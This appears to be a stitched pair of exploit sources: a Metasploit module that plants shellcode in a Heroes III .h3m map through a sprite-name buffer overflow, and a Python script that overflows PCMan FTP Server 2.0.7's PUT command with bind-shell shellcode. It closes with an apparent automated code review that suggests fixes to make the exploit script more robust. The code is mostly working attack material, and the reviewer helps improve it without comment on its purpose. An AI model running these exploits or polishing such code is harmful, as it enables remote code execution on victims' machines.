'Name' => 'Heroes of Might and Magic III .h3m Map file Buffer Overflow',
'Description' => %q{
This module embeds an exploit into an ucompressed map file (.h3m) for
Heroes of Might and Magic III. Once the map is started in-game, a
buffer overflow occuring when loading object sprite names leads to
shellcode execution.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Pierre Lindblad', # Vulnerability discovery
'John AAkerblom' # Vulnerability discovery, PoC and Metasploit module
],
'References' =>
[
[ 'EDB', '37716' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process'
},
'Platform' => 'win',
'Targets' =>
[
[
'H3 Complete 4.0.0.0 [Heroes3.exe 78956DFAB3EB8DDF29F6A84CF7AD01EE]',
{
# Two "Anticrash"-gadgets are needed or the game will crash before ret
#
# Anticrash1, needs to pass the following code down to final JMP:
# MOV EAX, DWORD PTR DS : [ESI + 4] ; [Anticrash1 + 4]
# XOR EBX, EBX
# CMP EAX, EBX
# JE SHORT <crash spot> ; JMP to crash if EAX is 0
# MOV CL, BYTE PTR DS : [EAX - 1]
# CMP CL, BL
# JE SHORT <crash spot> ; JMP to crash if the byte before [EAX] is 0
# CMP CL, 0FF
# JE SHORT <crash spot> ; JMP to crash if the byte before [EAX] is 0xFF
# CMP EDI, EBX
# JNE <good spot> ; JMP to good spot. Always occurs if we get this far
#
# Summary: An address which when incremented by 4 and then dereferenced
# leads to for example a string which is preceeded neither by a 0x00 or 0xFF
'Anticrash1' => 0x004497D4,
# Anticrash2, needs to return out of the following call (tricky):
#
# MOV EAX, DWORD PTR DS : [ECX] ; [Anticrash2]
# CALL DWORD PTR DS : [EAX + 4] ; [[Anticrash2] + 4]
#
# Summary: An address which when dereferenced leads to an address that
# when incremented by 4 and then deferenced leads to a function returning
# without accessing any registers/memory that would cause a crash.
'Anticrash2' => 0x006A6430,
'Ret' => 0x004EFF87, # CALL ESP Heroes3.exe
'Padding' => 121 # Amount of bytes from exploit's 7 initial 0x00 bytes and saved eip
}
],
[
'HD Mod 3.808 build 9 [Heroes3 HD.exe 56614D31CC6F077C2D511E6AF5619280]',
{
'Anticrash1' => 0x00456A48,
'Anticrash2' => 0x006A6830,
'Ret' => 0x00580C0F, # CALL ESP Heroes3 HD.exe
'Padding' => 121 # Amount of bytes from exploit's 7 initial 0x00 bytes and saved eip
}
],
[
'Heroes III Demo 1.0.0.0 [h3demo.exe 522B6F45F534058D02A561838559B1F4]',
{
# The two anticrash gadgets are accessed in reverse order for this target,
# meaning that the documentation above for Anticrash1 applies to Anticrash2
# here. However, Anticrash1 here is accessed differently than the other targets.
# Anticrash1, needs to pass the following code:
# CMP BYTE PTR SS:[EBP+5C], 72 ; [Anticrash1 + 0x5C]
# JNE 00591F37
# MOV EAX,DWORD PTR SS:[EBP+38] ; [Anticrash1 + 0x38]
'Anticrash1' => 0x00580C0F, # Coincidentally the Ret value from HD Mod target
# Anticrash2, see documentation for Anticrash1 (not 2) in H3 Complete 4.0.0.0 target
'Anticrash2' => 0x005CE200,
'Ret' => 0x0043EAB1, # CALL ESP h3demo.exe
'Padding' => 109, # Amount of bytes from exploit's 7 initial 0x00 bytes and saved eip
'CRC32' => 0xFEEFB9EB
}
]
],
'Privileged' => false,
'DisclosureDate' => 'Jul 29 2015',
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME',
[
false,
'If file exists, exploit will be embedded' \
' into it. If not, a new default h3m file where' \
' it will be embedded will be created.',
'sploit.h3m'
])
], self.class)
end
def exploit
buf = ''
# Load h3m into buffer from uncompressed .h3m on disk/default data
begin
buf << read_file(datastore['FILENAME'])
print_status('File ' + datastore['FILENAME'] + ' exists, will embed exploit if possible')
rescue Errno::ENOENT
print_warning('File ' + datastore['FILENAME'] + ' does not exist, creating new file from ' \
'default .h3m data')
buf << make_default_h3m
end
# Find the object attributes array in the file by searching for a sprite name that occurs
# as the first game object in all maps.
objects_pos = buf.index('AVWmrnd0.def')
if objects_pos.nil?
print_error('Failed to find game object section in file ' + datastore['FILENAME'] + \
'. Make sure this file is an uncompressed .h3m (and has not yet had exploit embedded)')
return
end
# Entries in the objects array start with a string size followed by game sprite name string
# Move back 4 bytes from the first sprite name to get to the start of the objects array
objects_pos -= 4
print_good('Found object attributes array in file at decimal offset ' + objects_pos.to_s)
# Construct a malicious object entry with a big size, where the sprite name starts
# with a NULL terminator and 6 extra 0x00 bytes. The first 2 of those 6 can be anything,
# but certain values for the last 4 will cause the CALL-ESP gadget address to be overwritten.
# After the 7 0x00 bytes comes 121 bytes of random data and then the CALL ESP-gadget for
# overwriting the saved eip. Finally two "anticrash gadgets" that are used by the game before
# it returns to the CALL ESP-gadget are required for the game not to crash before returning.
size = 7 + target['Padding'] + 4 + 4 + 4 + payload.encoded.size
exp = ''
exp << [size].pack('V')
exp << "\x00" * 7 # The first byte terminates string, next 2 dont matter, last 4 need to be 0
exp << rand_text(target['Padding'])
exp << [target.ret].pack('V')
exp << [target['Anticrash1']].pack('V')
exp << [target['Anticrash2']].pack('V')
exp << payload.encoded
# Embed malicious object entry. It is okay if we overwrite the rest of the file and extend buf
from = objects_pos
to = from + size
buf[from..to] = exp
print_good('Embedded exploit between decimal file offsets ' + from.to_s + ' and ' + to.to_s)
# Demo version has a crc32 check to disallow other maps than the one it comes with.
if target['CRC32']
buf = forge_crc32(buf, target['CRC32'])
if Zlib.crc32(buf) == target['CRC32']
print_good('Forged CRC32 to 0x%08X by adding 4 bytes at end of file' % target['CRC32'])
else
print_error('Failed to forge CRC32')
return
end
end
# Write the uncompressed exploit .h3m (the game can load uncompressed .h3ms)
file_create(buf)
end
def substring_pos(string, substring)
string.enum_for(:scan, substring).map { $~.offset(0)[0] }
end
#
# Loads a file
#
def read_file(fname)
buf = ''
::File.open(fname, 'rb') do |f|
buf << f.read
end
buf
end
#
# Returns data for a minimimum required S size h3m map containing 2 players
#
def make_default_h3m
buf = ''
# Set map specifications to 36x36 (0x24000000) map with 2 players, with
# default/no settings for name, description, victory condition etc
buf << "\x0e\x00\x00\x00\x01\x24\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
buf << "\x00\x00\x01\x01\x01\x00\x01\x00\x00\x00\xff\x01\x01\x00\x01\x00"
buf << "\x00\x00\xff\x00\x00\x00\x00\x00\x00\x00\xff\x00\x00\x00\x00\x8c"
buf << "\x00\x00\xff\x00\x00\x00\x00\xb1\x00\x00\xff\x00\x00\x00\x00\x00"
buf << "\x00\x00\xff\x00\x00\x00\x00\x7f\x00\x00\xff\x00\x00\x00\x00\x48"
buf << "\x00\x00\xff\xff\xff\x00"
buf << "\xFF" * 16
buf << "\x00" * 35
# Each tile is 7 bytes, fill map with empty dirt tiles (0x00)
buf << "\x00" * (36 * 36 * 7)
# Set object attribute array count to 1
buf << "\x01\x00\x00\x00"
# Size of first sprite name, this will be overwritten
buf << "\x12\x34\x56\x78"
# Standard name for first object, which will be searched for
buf << 'AVWmrnd0.def'
buf
end
#
# Forge crc32 by adding 4 bytes at the end of data
# http://blog.stalkr.net/2011/03/crc-32-forging.html
#
def forge_crc32(data, wanted_crc)
crc32_reverse = [
0x00000000, 0xDB710641, 0x6D930AC3, 0xB6E20C82,
0xDB261586, 0x005713C7, 0xB6B51F45, 0x6DC41904,
0x6D3D2D4D, 0xB64C2B0C, 0x00AE278E, 0xDBDF21CF,
0xB61B38CB, 0x6D6A3E8A, 0xDB883208, 0x00F93449,
0xDA7A5A9A, 0x010B5CDB, 0xB7E95059, 0x6C985618,
0x015C4F1C, 0xDA2D495D, 0x6CCF45DF, 0xB7BE439E,
0xB74777D7, 0x6C367196, 0xDAD47D14, 0x01A57B55,
0x6C616251, 0xB7106410, 0x01F26892, 0xDA836ED3,
0x6F85B375, 0xB4F4B534, 0x0216B9B6, 0xD967BFF7,
0xB4A3A6F3, 0x6FD2A0B2, 0xD930AC30, 0x0241AA71,
0x02B89E38, 0xD9C99879, 0x6F2B94FB, 0xB45A92BA,
0xD99E8BBE, 0x02EF8DFF, 0xB40D817D, 0x6F7C873C,
0xB5FFE9EF, 0x6E8EEFAE, 0xD86CE32C, 0x031DE56D,
0x6ED9FC69, 0xB5A8FA28, 0x034AF6AA, 0xD83BF0EB,
0xD8C2C4A2, 0x03B3C2E3, 0xB551CE61, 0x6E20C820,
0x03E4D124, 0xD895D765, 0x6E77DBE7, 0xB506DDA6,
0xDF0B66EA, 0x047A60AB, 0xB2986C29, 0x69E96A68,
0x042D736C, 0xDF5C752D, 0x69BE79AF, 0xB2CF7FEE,
0xB2364BA7, 0x69474DE6, 0xDFA54164, 0x04D44725,
0x69105E21, 0xB2615860, 0x048354E2, 0xDFF252A3,
0x05713C70, 0xDE003A31, 0x68E236B3, 0xB39330F2,
0xDE5729F6, 0x05262FB7, 0xB3C42335, 0x68B52574,
0x684C113D, 0xB33D177C, 0x05DF1BFE, 0xDEAE1DBF,
0xB36A04BB, 0x681B02FA, 0xDEF90E78, 0x05880839,
0xB08ED59F, 0x6BFFD3DE, 0xDD1DDF5C, 0x066CD91D,
0x6BA8C019, 0xB0D9C658, 0x063BCADA, 0xDD4ACC9B,
0xDDB3F8D2, 0x06C2FE93, 0xB020F211, 0x6B51F450,
0x0695ED54, 0xDDE4EB15, 0x6B06E797, 0xB077E1D6,
0x6AF48F05, 0xB1858944, 0x076785C6, 0xDC168387,
0xB1D29A83, 0x6AA39CC2, 0xDC419040, 0x07309601,
0x07C9A248, 0xDCB8A409, 0x6A5AA88B, 0xB12BAECA,
0xDCEFB7CE, 0x079EB18F, 0xB17CBD0D, 0x6A0DBB4C,
0x6567CB95, 0xBE16CDD4, 0x08F4C156, 0xD385C717,
0xBE41DE13, 0x6530D852, 0xD3D2D4D0, 0x08A3D291,
0x085AE6D8, 0xD32BE099, 0x65C9EC1B, 0xBEB8EA5A,
0xD37CF35E, 0x080DF51F, 0xBEEFF99D, 0x659EFFDC,
0xBF1D910F, 0x646C974E, 0xD28E9BCC, 0x09FF9D8D,
0x643B8489, 0xBF4A82C8, 0x09A88E4A, 0xD2D9880B,
0xD220BC42, 0x0951BA03, 0xBFB3B681, 0x64C2B0C0,
0x0906A9C4, 0xD277AF85, 0x6495A307, 0xBFE4A546,
0x0AE278E0, 0xD1937EA1, 0x67717223, 0xBC007462,
0xD1C46D66, 0x0AB56B27, 0xBC5767A5, 0x672661E4,
0x67DF55AD, 0xBCAE53EC, 0x0A4C5F6E, 0xD13D592F,
0xBCF9402B, 0x6788466A, 0xD16A4AE8, 0x0A1B4CA9,
0xD098227A, 0x0BE9243B, 0xBD0B28B9, 0x667A2EF8,
0x0BBE37FC, 0xD0CF31BD, 0x662D3D3F, 0xBD5C3B7E,
0xBDA50F37, 0x66D40976, 0xD03605F4, 0x0B4703B5,
0x66831AB1, 0xBDF21CF0, 0x0B101072, 0xD0611633,
0xBA6CAD7F, 0x611DAB3E, 0xD7FFA7BC, 0x0C8EA1FD,
0x614AB8F9, 0xBA3BBEB8, 0x0CD9B23A, 0xD7A8B47B,
0xD7518032, 0x0C208673, 0xBAC28AF1, 0x61B38CB0,
0x0C7795B4, 0xD70693F5, 0x61E49F77, 0xBA959936,
0x6016F7E5, 0xBB67F1A4, 0x0D85FD26, 0xD6F4FB67,
0xBB30E263, 0x6041E422, 0xD6A3E8A0, 0x0DD2EEE1,
0x0D2BDAA8, 0xD65ADCE9, 0x60B8D06B, 0xBBC9D62A,
0xD60DCF2E, 0x0D7CC96F, 0xBB9EC5ED, 0x60EFC3AC,
0xD5E91E0A, 0x0E98184B, 0xB87A14C9, 0x630B1288,
0x0ECF0B8C, 0xD5BE0DCD, 0x635C014F, 0xB82D070E,
0xB8D43347, 0x63A53506, 0xD5473984, 0x0E363FC5,
0x63F226C1, 0xB8832080, 0x0E612C02, 0xD5102A43,
0x0F934490, 0xD4E242D1, 0x62004E53, 0xB9714812,
0xD4B55116, 0x0FC45757, 0xB9265BD5, 0x62575D94,
0x62AE69DD, 0xB9DF6F9C, 0x0F3D631E, 0xD44C655F,
0xB9887C5B, 0x62F97A1A, 0xD41B7698, 0x0F6A70D9
]
# forward calculation of CRC up to pos, sets current forward CRC state
fwd_crc = 0xffffffff
data.each_byte do |c|
fwd_crc = (fwd_crc >> 8) ^ Zlib.crc_table[(fwd_crc ^ c) & 0xff]
end
# backward calculation of CRC up to pos, sets wanted backward CRC state
bkd_crc = wanted_crc ^ 0xffffffff
# deduce the 4 bytes we need to insert
[fwd_crc].pack('<L').each_byte.reverse_each do |c|
bkd_crc = ((bkd_crc << 8) & 0xffffffff) ^ crc32_reverse[bkd_crc >> 24] ^ c
end
res = data + [bkd_crc].pack('<L')
res
end
end


@ -0,0 +1,55 @@
#!/usr/bin/python
# title: PCMan FTP Server v2.0.7 Buffer Overflow - PUT Command
# author: @shipcod3 (Jay Turla)
# nc <host> 9988
# Tested on Windows XP Service Pack 3 - English
# description: Buffer overflow is triggered upon sending long string using the command PUT to PCMAN FTP 2.07
import socket
import sys
# msfpayload windows/shell_bind_tcp LPORT=9988 R| msfencode -b '\x00\x0A\x0D' -t c
shellcode = (
"\xdb\xd0\xbb\x36\xcc\x70\x15\xd9\x74\x24\xf4\x5a\x33\xc9\xb1"
"\x56\x83\xc2\x04\x31\x5a\x14\x03\x5a\x22\x2e\x85\xe9\xa2\x27"
"\x66\x12\x32\x58\xee\xf7\x03\x4a\x94\x7c\x31\x5a\xde\xd1\xb9"
"\x11\xb2\xc1\x4a\x57\x1b\xe5\xfb\xd2\x7d\xc8\xfc\xd2\x41\x86"
"\x3e\x74\x3e\xd5\x12\x56\x7f\x16\x67\x97\xb8\x4b\x87\xc5\x11"
"\x07\x35\xfa\x16\x55\x85\xfb\xf8\xd1\xb5\x83\x7d\x25\x41\x3e"
"\x7f\x76\xf9\x35\x37\x6e\x72\x11\xe8\x8f\x57\x41\xd4\xc6\xdc"
"\xb2\xae\xd8\x34\x8b\x4f\xeb\x78\x40\x6e\xc3\x75\x98\xb6\xe4"
"\x65\xef\xcc\x16\x18\xe8\x16\x64\xc6\x7d\x8b\xce\x8d\x26\x6f"
"\xee\x42\xb0\xe4\xfc\x2f\xb6\xa3\xe0\xae\x1b\xd8\x1d\x3b\x9a"
"\x0f\x94\x7f\xb9\x8b\xfc\x24\xa0\x8a\x58\x8b\xdd\xcd\x05\x74"
"\x78\x85\xa4\x61\xfa\xc4\xa0\x46\x31\xf7\x30\xc0\x42\x84\x02"
"\x4f\xf9\x02\x2f\x18\x27\xd4\x50\x33\x9f\x4a\xaf\xbb\xe0\x43"
"\x74\xef\xb0\xfb\x5d\x8f\x5a\xfc\x62\x5a\xcc\xac\xcc\x34\xad"
"\x1c\xad\xe4\x45\x77\x22\xdb\x76\x78\xe8\x6a\xb1\xb6\xc8\x3f"
"\x56\xbb\xee\x98\xa2\x32\x08\x8c\xba\x12\x82\x38\x79\x41\x1b"
"\xdf\x82\xa3\x37\x48\x15\xfb\x51\x4e\x1a\xfc\x77\xfd\xb7\x54"
"\x10\x75\xd4\x60\x01\x8a\xf1\xc0\x48\xb3\x92\x9b\x24\x76\x02"
"\x9b\x6c\xe0\xa7\x0e\xeb\xf0\xae\x32\xa4\xa7\xe7\x85\xbd\x2d"
"\x1a\xbf\x17\x53\xe7\x59\x5f\xd7\x3c\x9a\x5e\xd6\xb1\xa6\x44"
"\xc8\x0f\x26\xc1\xbc\xdf\x71\x9f\x6a\xa6\x2b\x51\xc4\x70\x87"
"\x3b\x80\x05\xeb\xfb\xd6\x09\x26\x8a\x36\xbb\x9f\xcb\x49\x74"
"\x48\xdc\x32\x68\xe8\x23\xe9\x28\x18\x6e\xb3\x19\xb1\x37\x26"
"\x18\xdc\xc7\x9d\x5f\xd9\x4b\x17\x20\x1e\x53\x52\x25\x5a\xd3"
"\x8f\x57\xf3\xb6\xaf\xc4\xf4\x92")
buffer = "\x90" * 30 + shellcode
#77c35459 : push esp # ret | {PAGE_EXECUTE_READ} [msvcrt.dll]
evil = "A"*2008 + "\x59\x54\xC3\x77" + buffer + "C"*(888-len(buffer))
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect((raw_input('Enter Host:'),21))
s.recv(1024)
s.send('USER anonymous\r\n')
s.recv(1024)
s.send('PASS anonymous\r\n')
s.recv(1024)
s.send('PUT ' + evil + '\r\n')
s.recv(1024)
s.send('QUIT\r\n')
s.close
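Review bot: `s.close` on the last line is a bare attribute reference, not a call, so the socket is never closed explicitly and only goes away when the interpreter exits; it should read `s.close()`. The `connect=` assignment on the line after `s=socket.socket(...)` stores the `None` that `socket.connect` returns and is never read, so it can simply be `s.connect((raw_input('Enter Host:'), 21))`. None of the `send`/`recv` calls are guarded, so a refused connection or a server that drops the session after the PUT surfaces as an unhandled `socket.error` traceback instead of a readable message; wrapping the session in `with contextlib.closing(s):` plus a `try`/`except socket.error` would cover both the cleanup and the error reporting. The script is Python 2 only (`raw_input`, implicit byte strings under the `#!/usr/bin/python` shebang), which is worth stating in the header comment next to the "Tested on" line.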